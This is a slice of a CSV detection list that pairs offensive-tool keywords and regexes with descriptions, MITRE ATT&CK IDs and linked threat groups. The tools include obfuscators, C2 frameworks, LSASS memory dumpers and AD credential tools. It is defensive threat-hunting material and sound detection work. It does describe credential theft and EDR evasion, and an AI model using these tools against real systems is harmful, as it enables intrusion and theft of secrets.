"*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*",".{0,1000}\-out.{0,1000}\.exe\s\-r\:.{0,1000}System\.Drawing\.dll.{0,1000}System\.Management\.Automation.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","54034"
"*--out=nimcrypt*",".{0,1000}\-\-out\=nimcrypt.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","54035"
"*Out-CompressedCommand.ps1*",".{0,1000}Out\-CompressedCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54036"
"*Out-CompressedDll.ps1*",".{0,1000}Out\-CompressedDll\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","54037"
"*Out-CompressedDLL.ps1*",".{0,1000}Out\-CompressedDLL\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","54038"
"*Out-DnsTxt.ps1*",".{0,1000}Out\-DnsTxt\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","54039"
"*Out-EncodedAsciiCommand.ps1*",".{0,1000}Out\-EncodedAsciiCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54040"
"*Out-EncodedAsciiCommand.ps1*",".{0,1000}Out\-EncodedAsciiCommand\.ps1.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54041"
"*Out-EncodedBinaryCommand.*",".{0,1000}Out\-EncodedBinaryCommand\..{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54042"
"*Out-EncodedBinaryCommand.ps1*",".{0,1000}Out\-EncodedBinaryCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54043"
"*Out-EncodedBXORCommand*",".{0,1000}Out\-EncodedBXORCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54044"
"*Out-EncodedBXORCommand.ps1*",".{0,1000}Out\-EncodedBXORCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54045"
"*Out-EncodedHexCommand.*",".{0,1000}Out\-EncodedHexCommand\..{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54046"
"*Out-EncodedOctalCommand.*",".{0,1000}Out\-EncodedOctalCommand\..{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54047"
"*Out-EncodedOctalCommand.ps1*",".{0,1000}Out\-EncodedOctalCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54048"
"*Out-EncodedSpecialCharOnlyCommand*",".{0,1000}Out\-EncodedSpecialCharOnlyCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54049"
"*Out-EncodedSpecialCharOnlyCommand.ps1*",".{0,1000}Out\-EncodedSpecialCharOnlyCommand\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54050"
"*Out-EncodedWhitespaceCommand*",".{0,1000}Out\-EncodedWhitespaceCommand.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54051"
"*outflank_stage1.implant*",".{0,1000}outflank_stage1\.implant.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","54052"
"*Outflank-Dumpert*",".{0,1000}Outflank\-Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","54053"
"*Outflank-Dumpert.*",".{0,1000}Outflank\-Dumpert\..{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","54054"
"*outflanknl/Dumpert*",".{0,1000}outflanknl\/Dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","54055"
"*outflanknl/EvilClippy*",".{0,1000}outflanknl\/EvilClippy.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","54056"
"*outflanknl/Net-GPPPassword*",".{0,1000}outflanknl\/Net\-GPPPassword.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","54057"
"*outflanknl/NetshHelperBeacon*",".{0,1000}outflanknl\/NetshHelperBeacon.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","54058"
"*outflanknl/PrintNightmare*",".{0,1000}outflanknl\/PrintNightmare.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","1","N/A","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","54059"
"*outflanknl/Recon-AD*",".{0,1000}outflanknl\/Recon\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","54060"
"*outflanknl/Recon-AD*",".{0,1000}outflanknl\/Recon\-AD.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","54061"
"*outflanknl/SharpHide*",".{0,1000}outflanknl\/SharpHide.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","54062"
"*outflanknl/Spray-AD*",".{0,1000}outflanknl\/Spray\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","54063"
"*outflanknl/WdToggle*",".{0,1000}outflanknl\/WdToggle.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","54064"
"*Outflank-Recon-AD*",".{0,1000}Outflank\-Recon\-AD.{0,1000}","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","10","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","54065"
"*OutlookEmailAbuse.ps1*",".{0,1000}OutlookEmailAbuse\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","54066"
"*Out-Minidump *",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","54067"
"*Out-Minidump *",".{0,1000}\sOut\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","54068"
"*Out-Minidump.ps1*",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1065","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","54069"
"*Out-Minidump.ps1*",".{0,1000}Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","54070"
"*Out-ObfuscatedArrayExpressionAst *",".{0,1000}Out\-ObfuscatedArrayExpressionAst\s.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","54071"
"*Out-ObfuscatedArrayExpressionAst *",".{0,1000}Out\-ObfuscatedArrayExpressionAst\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54072"
